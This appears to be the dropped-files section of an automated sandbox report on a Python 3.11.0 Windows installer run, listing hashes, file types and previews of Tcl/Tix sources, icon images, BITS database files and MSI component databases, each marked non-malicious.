                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13870
                                                                                                                                Entropy (8bit):4.9264236647402395
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:TytW7n0q8xw6ZH05OLI/djcx+OVl3A/Zmb+IJmbz3kI4Q647TtlpjpKLDSZ0dKZ:9iU5l/W7l3wI+7zGmNSDSZ0IZ
                                                                                                                                MD5:62D495CD638A3629CE7343CE1259EB51
                                                                                                                                SHA1:FF39C59AF472DC47E53962360512D04DE3CF6A65
                                                                                                                                SHA-256:8D859FAD46257A6CE45170EC2740BDA483AE71D1CAE244BB6D605B8FB0397A35
                                                                                                                                SHA-512:3E95018B94E651D126B14F0773B0F3D11076FD2D3A145809758A86D40C810348A88DA17E1D9B2EDCFACA5BBC337895E3E123CA3AD8B90F074237539393ABB1B0
                                                                                                                                Malicious:false
                                                                                                                                Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Balloon.tcl,v 1.7 2008/02/27 22:17:28 hobbs Exp $..#..# Balloon.tcl --..#..#.The help widget. It provides both "balloon" type of help..#.message and "status bar" type of help message. You can use..#.this widget to indicate the function of the widgets inside..#.your application...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#......tixWidgetClass tixBalloon {.. -classname TixBalloon.. -superclass tixShell.. -method {...bind post unbind.. }.. -flag {...-installcolormap -initwait -state -statusbar -cursor.. }.. -configspec {...{-installcolormap installColormap InstallColormap false}...{-initwait initWait InitWait 1000}...{-state state State both}...{-statusbar statusBar St
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:GIF image data, version 89a, 16 x 12
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):90
                                                                                                                                Entropy (8bit):5.080813614323921
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Cw6/R/Myj1C/xlDnOhmiq+umZY9DM9/hE:R6/R/zRC2hmf+MD4y
                                                                                                                                MD5:D43A31BBB551890C7B2C98423519BB1F
                                                                                                                                SHA1:38CF4225FDC5906CCFFF655B26F48E4785115904
                                                                                                                                SHA-256:486A8B71C0F9241A5BFF2B275E8F011349076BF4FDD777ED1458EB050C0633BB
                                                                                                                                SHA-512:D12E306BB2032CBBC247E1EC77CA2DC9A8C112930609E49D37678DC62B76BAF8BEA97E988869D53ED5CBB577D6E3C2513E8944087D48BD8F971FAEF9908130D1
                                                                                                                                Malicious:false
                                                                                                                                Preview:GIF89a................[WF!.......,..........+..a.'/T[.B..8.. ...U..U..>....P...q.,..;
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):226
                                                                                                                                Entropy (8bit):4.41475679753871
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:HeA+morM0+zqVl9xufHadVhVq+HNQL+hb:HecaxxLHAU8I
                                                                                                                                MD5:DBD7E9DE97C8B76304DDFE41D6F4E7CF
                                                                                                                                SHA1:635D3C04F338D8AEFF1852B03FF408162E2DD8E6
                                                                                                                                SHA-256:7FEB01403909A62E682C5A2832DD1F63D11FCF847C0ABF0BD2E11B6ACDE589B1
                                                                                                                                SHA-512:ED7949174A2ABE6129E4E71FB337A62358980382DF485D9CF9F4163AF7BB9C5F761C98F1426F8AB031828F267F70AA9C1B3C30459C2F143A443F115BF64EE4E2
                                                                                                                                Malicious:false
                                                                                                                                Preview:#define act_fold_width 16..#define act_fold_height 10..static unsigned char act_fold_bits[] = {.. 0xfc, 0x00, 0xaa, 0x0f, 0x55, 0x15, 0xeb, 0xff, 0x15, 0x80, 0x0b, 0x40,.. 0x05, 0x20, 0x03, 0x10, 0x01, 0x08, 0xff, 0x07};..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):458
                                                                                                                                Entropy (8bit):4.288406397553013
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:UGXYfjLLSKsADKNGTrmFHeU9sNB245820Fm4/ABaKUkiVV:UGobLLOIL3weks3R5820nWeV
                                                                                                                                MD5:FAE7779F41E8F7F38803D3D236F963F3
                                                                                                                                SHA1:4825D41800B4DFD066C3EE0B10D55F96EBEBBFD4
                                                                                                                                SHA-256:4A636D32B87244F7948859EEE4ACD512D85EC245CD5A81C8CBEB4FE12B8D74CE
                                                                                                                                SHA-512:F67B37763B695FE4D0FD2C88343D73ED60CF75F2B4A97E9A9DB0213AA5354829147A34E7485E3A3E44D961E635281A386BCD4514D012DD05CE76299ED9358720
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* XPM */..static char * act_fold_xpm[] = {../* width height num_colors chars_per_pixel */.."16 12 4 1",../* colors */.." .s None.c None",.."..c black",.."X.c yellow",.."o.c #5B5B57574646",../* pixels */.." .... ",.." .XXXX. ",.." .XXXXXX. ",.."............. ",..".oXoXoXoXoXo. ",..".XoX............",..".oX.XXXXXXXXXXX.",..".Xo.XXXXXXXXXX. ",..".o.XXXXXXXXXXX. ",..".X.XXXXXXXXXXX. ",.."..XXXXXXXXXX.. ",.."............. "};..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:xbm image (11x, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):269
                                                                                                                                Entropy (8bit):3.959571321643695
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:HeA87SY087eOREnE9+EKfHM++++wuG3dumuG3cGG:HeD7F7jiS+EkJO
                                                                                                                                MD5:D8C7C078E8214BA1544C6B5B966C4C46
                                                                                                                                SHA1:051A1DA30DB312D83BA54E340EB4D1DB0680CD1A
                                                                                                                                SHA-256:CE68AAC68BA116CFB47B9F3556C058CE30C92F0832341C2632C9CD4D8BE8AD5F
                                                                                                                                SHA-512:E67A76CD79FB9D203CD072D332AD1D34AA6E23FB60296D87CD111E3B05EB30444071535BC6AF4D63F7DCABAF3C5716FCACBDC888388FC7D3EB533D6E9E07B63F
                                                                                                                                Malicious:false
                                                                                                                                Preview:#define cbxarrow_width 11..#define cbxarrow_height 14..static char cbxarrow_bits[] = {.. 0x00, 0x00, 0x70, 0x00, 0x70, 0x00, 0x70, 0x00, 0x70, 0x00, 0x70, 0x00,.. 0xfe, 0x03, 0xfc, 0x01, 0xf8, 0x00, 0x70, 0x00, 0x20, 0x00, 0x00, 0x00,.. 0xfe, 0x03, 0xfe, 0x03};..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:xbm image (13x, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):260
                                                                                                                                Entropy (8bit):4.109386418329628
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:HeA8F/080RLEl9zVmfH02SLpVyhSLpVyhSYy0VyhSLpVyhSLpVyhSYFey:HeDx0eb3Rp88p8F88p88p8ay
                                                                                                                                MD5:645AB98ACEA922179756D14F74BCC0FD
                                                                                                                                SHA1:EEA71EFBF284B02F7803B2A32369718ABF8E4188
                                                                                                                                SHA-256:592D27CA23AD113C37A16E7DA7D67EA28A51571FE24A8BACA4838915DDCBA641
                                                                                                                                SHA-512:19191DF241BAF1F2B5B1308BD0175870732BCE3FDBB1277FF783238EABDA65EAB017EDC788664D9FC00150322E072EE599AE5534CD2FE0C2FA8963D3585A3D51
                                                                                                                                Malicious:false
                                                                                                                                Preview:#define ck_def_width 13..#define ck_def_height 13..static unsigned char ck_def_bits[] = {.. 0xff, 0x1f, 0x01, 0x10, 0x55, 0x15, 0x01, 0x10, 0x55, 0x15, 0x01, 0x10,.. 0x55, 0x15, 0x01, 0x10, 0x55, 0x15, 0x01, 0x10, 0x55, 0x15, 0x01, 0x10,.. 0xff, 0x1f};..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):334
                                                                                                                                Entropy (8bit):4.271640891568391
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:HeA0orM0erM06KCM0yin9vjxfHuChm7KH8XLKAIhiIhiOhoRDV2hBkf:HeDayrtCRrxm7fXLVIhiIhiOCRDELi
                                                                                                                                MD5:4521B55216592B3971821A616CD30F0E
                                                                                                                                SHA1:38350108FEF3EA9B4525B11351C9BEA990846AB0
                                                                                                                                SHA-256:9A896927B99EFA61981B769BC685E6D411180FE31DC4979FA5D576FC1C7E26DC
                                                                                                                                SHA-512:1352EA05F0112BADD45D0D8417465EFD97DF98B7F96475FF6978A9E1EE29D83663A24832A9143058925AE3BF005C29ED112EBFE28860F4648B213B96FD013E36
                                                                                                                                Malicious:false
                                                                                                                                Preview:#define drop_width 16..#define drop_height 16..#define drop_x_hot 6..#define drop_y_hot 4..static unsigned char drop_bits[] = {.. 0x00, 0x00, 0xfe, 0x07, 0x02, 0x04, 0x02, 0x04, 0x42, 0x04, 0xc2, 0x04,.. 0xc2, 0x05, 0xc2, 0x07, 0xc2, 0x07, 0xc2, 0x0f, 0xfe, 0x1f, 0xc0, 0x07,.. 0xc0, 0x06, 0x00, 0x0c, 0x00, 0x1c, 0x00, 0x08};..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:GIF image data, version 89a, 12 x 12
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):76
                                                                                                                                Entropy (8bit):4.615796921478966
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:CkklR/KwltxlkpWerkTND2YPi:HsR/q7kZi
                                                                                                                                MD5:DA15E983B22BF485BFC7249B1E94F0E3
                                                                                                                                SHA1:FC544E677A383869F742C15ED1B32BF6FF9F0502
                                                                                                                                SHA-256:1AD2FBC604EC60116849574BC4DC371F8CB5796E14571EA2684C8BAB99B4C467
                                                                                                                                SHA-512:90AD6B083F0253BFCEC975173BC1BFE31422F6F155AEF45D960ED9C49012142C82EE1EF0CDEB5B6C21D89231931EB19D9D4587B24258683DA1E2AC78BA905208
                                                                                                                                Malicious:false
                                                                                                                                Preview:GIF89a...................!.......,...........D..k..X{..@i.Yl.yW(r.G...}....;
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:xbm image (12x, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):238
                                                                                                                                Entropy (8bit):3.961400794483653
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:HDKA596S0+ovGB70596NwUXovNlJMI2IvMR5ffHBkVFJvHJF8L3VZF9JF9JF9JFF:HeAuGoeB70uNeVl9ZMDfHOkh3GG
                                                                                                                                MD5:F5CC07DB201FA60FACCEC45A55856A9A
                                                                                                                                SHA1:0B8D6FCFE382134426D81E02A3C38F8AC9AB6254
                                                                                                                                SHA-256:EF733AD2DA584A41A4D1BF5525E080C60A5F2F332E7D583AB0003D23E1CDCB71
                                                                                                                                SHA-512:91161518A2E8356082B0C04A13749C2B0859771DB8F97C97B9388F9133DD02F659BB6495984A4AB7B5B03E961117BE2912EE53D2075B672B790A7DAA5EF2C12B
                                                                                                                                Malicious:false
                                                                                                                                Preview:#define file_width 12..#define file_height 12..static unsigned char file_bits[] = {.. 0xfe, 0x00, 0x02, 0x03, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02,.. 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0xfe, 0x03};..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):316
                                                                                                                                Entropy (8bit):3.863813347149259
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:UGCinNS3iGeyURv3LSFHGJU9spLNgHqNlp69pFF29pLLFHmJ9f9LFHYh9f9LFHYU:UGXA3Vfcv3mFHeU9s3NWwooooooots
                                                                                                                                MD5:2DDE5E6C2816C5560C27E7D2F9B267B5
                                                                                                                                SHA1:BE09C4BEED5B93CE65832D3C08DB6A75991FCC47
                                                                                                                                SHA-256:520E7D4A55E1AB59720FAF0A7BF31E54FC3B50F3B569C38C458D1943BF0BF731
                                                                                                                                SHA-512:818C7AD1713C512B0F5C1494A34742B251B658C56DF87CEE91721282E3143236B2BD53CF169696C5E0A9B0B58CEEA245E08060CABFD853EDD1DD87B249A0E12D
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* XPM */..static char * file_xpm[] = {.."12 12 3 1",.." .s None.c None",.."..c black",.."X.c #FFFFFFFFF3CE",.." ........ ",.." .XXXXXX. ",.." .XXXXXX... ",.." .XXXXXXXX. ",.." .XXXXXXXX. ",.." .XXXXXXXX. ",.." .XXXXXXXX. ",.." .XXXXXXXX. ",.." .XXXXXXXX. ",.." .XXXXXXXX. ",.." .XXXXXXXX. ",.." .......... "};..
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1310720
                                                                                                                                Entropy (8bit):0.706704996073529
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqv:2JIB/wUKUKQncEmYRTwh0D
                                                                                                                                MD5:013F467C056CF01290F928A90A2E8831
                                                                                                                                SHA1:047B047ACF51BC6F9F3C32ED118F782943028F4E
                                                                                                                                SHA-256:57A81FDD2E882EB5659E18B65E1CDCEF27150A84205F3AFAC47AA46BDB4173D0
                                                                                                                                SHA-512:4BCCEEB8144A8868862EB7865FBB28A3B4A25E93BB9CAFBF182DF98346BCCBFD674ABF7CA0E4A4C37FE004872A18AB622BBD17C2FF2492CB28AC88442FE7E59A
                                                                                                                                Malicious:false
                                                                                                                                Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x970bd26c, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1310720
                                                                                                                                Entropy (8bit):0.7900070373286413
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:bSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:bazaPvgurTd42UgSii
                                                                                                                                MD5:014991C16BAB1DC413FC123505937FC2
                                                                                                                                SHA1:C5E1AB9135E30FEA08D29949F3E8334E9D8F2899
                                                                                                                                SHA-256:2C4476BA09F9D4821E4600E0F5EB0D36D2BAC7F9E41F16A83402BA232AFE5AAD
                                                                                                                                SHA-512:D574D4D237DC6827884EAD090487C75AA27C73204B80310598FC9B3BA414D1C14340ACD629B912216F10BD86D26111B06F97337CE5124B2760F7CE586C5B9084
                                                                                                                                Malicious:false
                                                                                                                                Preview:...l... ...............X\...;...{......................0.`.....42...{5.7....|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................Oy.7....|.....................7....|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):16384
                                                                                                                                Entropy (8bit):0.08163589367896706
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:cSclltKYelfZuDvNt/57Dek3Jot97S/AllEqW3l/TjzzQ/t:cptKzlfkDvPR3toto/Amd8/
                                                                                                                                MD5:70A31C0A496EADBFF40CAE61A84453F5
                                                                                                                                SHA1:CFE6583BF93C7E0BFC798BB984C9AF976F444957
                                                                                                                                SHA-256:C686EA2BD9189C77F50D9DD5C34FBED2D7BEE74456F583FA58A9EF28C496D152
                                                                                                                                SHA-512:1D35085625C36A349D304EC261AFACBCDE10B54F69BEDE5DE3A0DCE108D88EB195C902399BF6D0060BCC924FF4A9AF0A21D74FF9B059DA3DAD632A140E82E0C9
                                                                                                                                Malicious:false
                                                                                                                                Preview:..7......................................;...{..7....|..42...{5.........42...{5.42...{5...Y.42...{59...................7....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Python 3.11.0 Core Interpreter (64-bit), Author: Python Software Foundation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Python 3.11.0 Core Interpreter (64-bit)., Template: x64;1033, Revision Number: {7491D45C-3224-49B6-8411-A0F51E8AF764}, Create Time/Date: Mon Oct 24 19:40:32 2022, Last Saved Time/Date: Mon Oct 24 19:40:32 2022, Number of Pages: 500, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.0.5722), Security: 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1912832
                                                                                                                                Entropy (8bit):7.986774568024727
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:v0kwtSMGyaiZpcNeEc8LFE4rJis6qt3O66q6RNvo4d:v0kwtSlP2a1c8LFmqNcpFl
                                                                                                                                MD5:50D59916C3C2337A7192ED9424CA0152
                                                                                                                                SHA1:06715E3C8C81742D6E3ACF3521486604AD236B6C
                                                                                                                                SHA-256:A00B4078FA97AD507BCA4494F158053B61D0EF0D75B7E7A898F816B1B2ADA563
                                                                                                                                SHA-512:BD4B337DBD1ECE34446CE129EF1EF6CF6540E22F6F0F43E2B41CC6499A02BFA15B4C9946A2A5DD765FC57AA783A7485133D4F0F8FFEFD63C307C7FBC1831031E
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Python 3.11.0 Development Libraries (64-bit), Author: Python Software Foundation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Python 3.11.0 Development Libraries (64-bit)., Template: x64;1033, Revision Number: {AF6ECF7A-D3A2-441F-B4A6-63C4AE3F5B27}, Create Time/Date: Mon Oct 24 19:41:04 2022, Last Saved Time/Date: Mon Oct 24 19:41:04 2022, Number of Pages: 500, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.0.5722), Security: 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):335872
                                                                                                                                Entropy (8bit):7.6879454389944035
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:KOPj2XBoyr8aLvyMcL/y8amyhAFJmiIdZXVVF8AkhA1ZqHGKQOf6HOMTtXsUl3+5:3j2XKqvHcGmyh0GdZlVFgpGw7gmo
                                                                                                                                MD5:870B3398F72BBD9614A11355594AD9AF
                                                                                                                                SHA1:40E9AF2E83D56635FD67577B9B07F9402695CFE9
                                                                                                                                SHA-256:107D8478A7E59EE1E662FF883D4DAB18A80A426B5C1502DD9CBA9ED5F25E74A2
                                                                                                                                SHA-512:97F39D09DCD93B9427AC9560128BCD6B870F8D79448E2FAF0CFA3E5909B0E6114AC00987B97120B33E970F6A97C1E37007B370AFE3F81AEBE4FD9A96A2E25EEF
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Python 3.11.0 Documentation (64-bit), Author: Python Software Foundation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Python 3.11.0 Documentation (64-bit)., Template: x64;1033, Revision Number: {44288BEF-ED6A-4B77-ACD7-9FF4C8E9415D}, Create Time/Date: Mon Oct 24 19:41:10 2022, Last Saved Time/Date: Mon Oct 24 19:41:10 2022, Number of Pages: 500, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.0.5722), Security: 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5197824
                                                                                                                                Entropy (8bit):7.987872164430188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:98304:ujPgdGs1Bx3jnmD+skvRhE12quVmVFmirGyzJZoqofdxBBZL02XmEhvc:uEdG2BxTnmQRhxUVnrGeSqWdxxL02/E
                                                                                                                                MD5:5315DCA2E662D1A7EB13BD41F93ABC67
                                                                                                                                SHA1:2A1FA39419E7F757ACEAA1FC05A0F811E791AEEC
                                                                                                                                SHA-256:6B4B9DACB83F2093D473B3ABA9BA783FD17E63D46BC9631FE4B2A88348BA7F5A
                                                                                                                                SHA-512:1916C135B9BAF513937A142AF56E9A1BDD78E39F57576D8C6B13B45B81C220D6978F9914F369F07CF61BC99D3871A39C76F057E640222D10675A9049D46D774C
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Python 3.11.0 Executables (64-bit), Author: Python Software Foundation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Python 3.11.0 Executables (64-bit)., Template: x64;1033, Revision Number: {577A8A20-5367-410E-97F5-8C0D5CFFA742}, Create Time/Date: Mon Oct 24 19:41:34 2022, Last Saved Time/Date: Mon Oct 24 19:41:34 2022, Number of Pages: 500, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.0.5722), Security: 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):655360
                                                                                                                                Entropy (8bit):7.922230806448315
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:stnHY7uBY1wiR/ogNm6BfQrFZJFYi0r3yB5DrTWLMu:oHY7L1LR/ogNTgFFYi0e/TWLMu
                                                                                                                                MD5:27B2208A5601658A87C8221B8654DACD
                                                                                                                                SHA1:D7F6CBD8B7DE5CB67DF4B09D405AD4EDD674ADF3
                                                                                                                                SHA-256:AFF0BC76B38FBF2B566E14F61BD1F942DC46E830F486FBDAF7667AB5FDCC85B5
                                                                                                                                SHA-512:766DA68E072324883EF678982B611F6E737CFA7F21D4FB21C885EE52E4CC5A44D18873D9128996127BED5AEBB8BD09E869F2DC554E9CAF460813657B374E15FE
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Python Launcher, Author: Python Software Foundation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Python Launcher., Template: Intel;1033, Revision Number: {2767721F-F9EE-4DAA-A763-9702207B40DF}, Create Time/Date: Mon Oct 24 19:37:06 2022, Last Saved Time/Date: Mon Oct 24 19:37:06 2022, Number of Pages: 500, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.0.5722), Security: 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):536576
                                                                                                                                Entropy (8bit):7.731056244901176
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:mpeoInQldQngUW62IpYLBrpNB9ALixRnz6Ruc/J7vx:mpsCQgUWyp8bD9PnzhiJ
                                                                                                                                MD5:C2699AEE6BD59D7092D0B119845A223B
                                                                                                                                SHA1:5675852CCA1AEA084D03EC1F1750FFD5AF98F635
                                                                                                                                SHA-256:4428512D8643C5C396434A43A53579946E6F6316C1C17FD175AFB62CCFC2959C
                                                                                                                                SHA-512:FB3AEE0E1F563B817882CB0C26539A76D5EBF2BE1B26087EB5F4D7C0C6BD534BAEC420B3A9A5C19E33754BAE3BEF4C16146B657F51310163299509E3B0EF99FC
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Python 3.11.0 Standard Library (64-bit), Author: Python Software Foundation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Python 3.11.0 Standard Library (64-bit)., Template: x64;1033, Revision Number: {8EB245CF-F1C9-4244-B9FB-C59D3B1249D7}, Create Time/Date: Mon Oct 24 19:41:44 2022, Last Saved Time/Date: Mon Oct 24 19:41:44 2022, Number of Pages: 500, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.0.5722), Security: 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8450048
                                                                                                                                Entropy (8bit):7.993478334875522
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:196608:JN0JP1ks3CHBFKsNeofEBtgIHHXaN8Na/PgxxWIRzxcQHGs:El1ks3czKsgvgkKNWa3g9zcgGs
                                                                                                                                MD5:6D384D6CF94D1C6A61EAE5B55BF99752
                                                                                                                                SHA1:DD78FB4D8C9B9AF8C03C541EFCCE21E7F908F22D
                                                                                                                                SHA-256:A722136B6A7042D30DA15D2C5B3ADA1B11FAC74F29BC83B754179F7899727C47
                                                                                                                                SHA-512:6E5AF02F78A831C3BA83D6007347272EF076B3FB198DEFBF42A7AC51BE0739E63E874173DC7207A679A0E3187D7EAEEE94DEB4017520ACF2AF50C8B0946466A6
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Python 3.11.0 Add to Path (64-bit), Author: Python Software Foundation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Python 3.11.0 Add to Path (64-bit)., Template: x64;1033, Revision Number: {63F01A40-09A8-4D83-8CDF-2D03CB575FB3}, Create Time/Date: Mon Oct 24 19:42:38 2022, Last Saved Time/Date: Mon Oct 24 19:42:38 2022, Number of Pages: 500, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.0.5722), Security: 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):49152
                                                                                                                                Entropy (8bit):4.958469999565396
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:Lq/H6JN9M1C6LM9M1CqZGYiSyvlBmPxWEwt:LQ6Jg13117ZG7Sy9YPxo
                                                                                                                                MD5:6E08EE3C5F477BC6480575A5B434BD3F
                                                                                                                                SHA1:B62E9C1D886C119860462C72F6C69DC2C0608FC7
                                                                                                                                SHA-256:66D723D903530F2B712C01F107F066B0DCD21D27F94B76A2D988750153A788F4
                                                                                                                                SHA-512:76017260F87E51C177AFF678300BD1CB6816F8D616115DA25833843B7596B4CDC3B217CA6DC8CA49F8BF2087F28C9C52CA288959769590EF1EDCA6B79F104CB4
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe
